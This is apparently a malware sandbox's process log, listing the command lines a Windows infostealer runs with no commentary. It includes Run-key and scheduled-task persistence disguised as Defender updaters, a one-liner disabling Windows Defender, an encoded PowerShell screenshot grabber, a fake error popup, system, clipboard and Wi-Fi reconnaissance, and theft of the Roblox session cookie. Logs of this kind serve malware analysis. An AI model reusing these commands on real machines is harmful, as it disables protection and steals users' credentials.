C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B5F2.tmp\B5F3.tmp\B5F4.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\Files\x.exe
"C:\Users\Admin\AppData\Local\Temp\Files\x.exe"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "x" /sc ONLOGON /tr "C:\Windows\system32\SubDir\x.exe" /rl HIGHEST /f
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0C0.tmp\C0C1.tmp\C0E1.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D0CD.tmp\D0CE.tmp\D0CF.bat C:\Windows\system32\java.exe"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E07D.tmp\E07E.tmp\E07F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\423asvt2\423asvt2.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE704.tmp" "c:\Users\Admin\AppData\Local\Temp\423asvt2\CSCBACEDEDA80F6495296225CE99EED4454.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA31.tmp\EA32.tmp\EA33.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F117.tmp\F118.tmp\F119.bat C:\Windows\system32\java.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
